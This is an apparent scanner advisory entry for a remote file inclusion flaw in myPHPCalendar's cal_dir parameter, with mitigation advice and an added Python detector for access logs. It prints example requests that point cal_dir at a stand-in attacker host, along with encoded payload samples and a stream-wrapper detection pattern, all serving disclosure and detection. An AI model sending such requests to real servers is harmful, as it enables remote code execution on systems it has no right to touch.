| VID | 21266 |
| Severity | 40 |
| Port | 80, ... |
| Protocol | TCP |
| Class | CGI |
| Detailed Description | myPHPCalendar is vulnerable to remote file inclusion (file injection) in several of its PHP scripts. myPHPCalendar is a freely available calendar application, written in PHP 4 and backed by a MySQL database, that runs on Microsoft Windows, Linux and Unix-based operating systems. In version 10192000 Build 1 Beta, the scripts admin.php, contacts.php and convert-date.php take the cal_dir request parameter and use it as the location from which further PHP files are included, without restricting it to a local directory. Because PHP's include() accepts URLs when remote file access is enabled, a remote attacker can host a malicious PHP file on a server under their control and send a crafted request whose cal_dir parameter points at that server; the target then fetches and executes the attacker's code in the context of the web server. Example requests: http://[target]/admin.php?cal_dir=http://[attacker]/ ; http://[target]/contacts.php?cal_dir=http://[attacker]/ ; http://[target]/convert-date.php?cal_dir=http://[attacker]/ . References: http://archives.neohapsis.com/archives/vulnwatch/2003-q4/0011.html . Platforms Affected: MyPHPCalendar 10192000 Build1 Beta; Linux (any version); Unix (any version); Windows (any version). |
| Recommendation | No vendor fix was available for this vulnerability as of June 2014. As a general mitigation for remote file inclusion, disabling remote file access in php.ini (allow_url_fopen = Off on PHP 4 and 5.1; allow_url_include = Off, the default, on PHP 5.2 and later) stops include() from fetching attacker-hosted files; restricting or removing the affected scripts until a fixed version is available also closes the exposure. |
| Related URL | (CVE) |
| Related URL | (SecurityFocus) |
| Related URL | 13409 (ISS) |
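Added example, not code from the advisory or from myPHPCalendar: a Python script that scans web-server access log lines for requests to the three affected scripts whose cal_dir parameter carries a URL scheme, which is the signature of the inclusion attempts described above. The /calendar/ install path, all IP addresses and the log lines themselves are constructed for the example; the list of PHP stream wrappers it also flags (php://, data://, expect://, phar://) goes beyond the plain http:// case the advisory describes and is an assumption about what is worth alerting on.

```python
"""Detect myPHPCalendar remote-file-inclusion attempts in web access logs.

Added example; not code from the advisory or from myPHPCalendar.
The install path (/calendar/), all IP addresses and the log lines are
constructed for the example.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Scripts the advisory names as including files from the cal_dir parameter.
VULNERABLE_SCRIPTS = {"admin.php", "contacts.php", "convert-date.php"}

# Values that make PHP's include() fetch something other than a local file.
# http/https/ftp are the plain RFI case from the advisory; the php://, data://,
# expect:// and phar:// stream wrappers are an extension beyond it (assumption
# that they are worth flagging; they exist only on later PHP versions).
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftps?|php|data|expect|phar):", re.I)

# Apache/Nginx "combined" log format; constructed pattern for the sample lines.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def inspect_request(uri):
    """Return {'script', 'cal_dir'} for an RFI attempt, or None for a benign URI."""
    parts = urlsplit(uri)
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in VULNERABLE_SCRIPTS:
        return None
    # parse_qs percent-decodes once; a second unquote() catches the
    # double-encoding trick (%253A%252F%252F) used to slip past single-pass filters.
    for raw in parse_qs(parts.query, keep_blank_values=True).get("cal_dir", []):
        value = unquote(raw)
        if REMOTE_SCHEME.match(value):
            return {"script": script, "cal_dir": value}
    return None


def scan_log(lines):
    """Return (client_ip, script, cal_dir) for every flagged request in the log."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        finding = inspect_request(m.group("uri"))
        if finding:
            hits.append((m.group("ip"), finding["script"], finding["cal_dir"]))
    return hits


# Constructed sample traffic (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Nov/2003:10:01:02 +0000] "GET /calendar/admin.php?cal_dir=http://192.0.2.5/ HTTP/1.0" 200 512',
    '203.0.113.7 - - [12/Nov/2003:10:01:03 +0000] "GET /calendar/contacts.php?cal_dir=%68%74%74%70%3A%2F%2F192.0.2.5%2F HTTP/1.0" 200 512',
    '198.51.100.9 - - [12/Nov/2003:10:02:00 +0000] "GET /calendar/convert-date.php?cal_dir=http%253A%252F%252F192.0.2.5%252Fevil HTTP/1.0" 200 77',
    '198.51.100.10 - - [12/Nov/2003:10:03:00 +0000] "GET /calendar/index.php?cal_dir=http://192.0.2.5/ HTTP/1.0" 200 900',
    '198.51.100.11 - - [12/Nov/2003:10:04:00 +0000] "GET /calendar/admin.php?cal_dir=../ HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for ip, script, target in scan_log(SAMPLE_LOG):
        print(f"{ip} RFI attempt via {script} cal_dir={target}")
```

Only the first three sample lines are reported: the fourth targets a script the advisory does not name, and the fifth passes a relative path rather than a URL. Matching on the decoded value rather than the raw query string is what catches the percent-encoded and double-encoded variants.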